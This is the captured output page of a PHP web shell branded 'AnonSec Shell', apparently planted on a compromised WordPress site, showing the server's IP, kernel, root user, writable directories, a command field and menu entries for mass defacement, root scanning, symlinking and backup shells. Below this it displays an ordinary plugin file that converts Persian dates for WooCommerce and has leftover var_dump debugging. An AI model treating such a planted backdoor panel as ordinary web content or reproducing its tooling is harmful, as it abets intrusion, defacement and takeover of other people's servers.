AnonSec Shell
Server IP : 104.21.14.48  /  Your IP : 18.220.169.22   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/wp-parsidate/includes/plugins/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/plugins/wp-parsidate/includes/plugins//fixes-woo.php
<?php
add_filter( 'wp_insert_post_data', 'wpp_wc_save_post', '9999', 2 );

function wpp_wc_save_post( $data, $postarr ) {
	if ( $data['post_type'] == 'shop_order' )
		$_POST['order_date'] = gregdate( 'Y-m-d', $_POST['order_date'] );
	if ( $data['post_type'] == 'product' ) {
		if ( isset( $_POST['_sale_price_dates_from'] ) and ! empty( $_POST['_sale_price_dates_from'] ) ) {
			$_POST['_sale_price_dates_from'] = gregdate( 'Y-m-d', $_POST['_sale_price_dates_from'] );
		}
		if ( isset( $_POST['_sale_price_dates_to'] ) and ! empty( $_POST['_sale_price_dates_to'] ) ) {
			$_POST['_sale_price_dates_to'] = gregdate( 'Y-m-d', $_POST['_sale_price_dates_to'] );
		}
	}

	return $data;
}

function getGTLangCustomFieldValue( $metadata, $object_id, $meta_key, $single ) {
	if ( $meta_key == '_sale_price_dates_from' ) {
		var_dump( $_POST );
		var_dump( func_get_args() );//die;
	}
	if ( $meta_key == '_sale_price_dates_to' ) {
		var_dump( $_POST );
		var_dump( func_get_args() );//die;
	}
}

//add_filter( 'update_post_metadata', 'getGTLangCustomFieldValue', 10, 4 );

Anon7 - 2022
AnonSec Team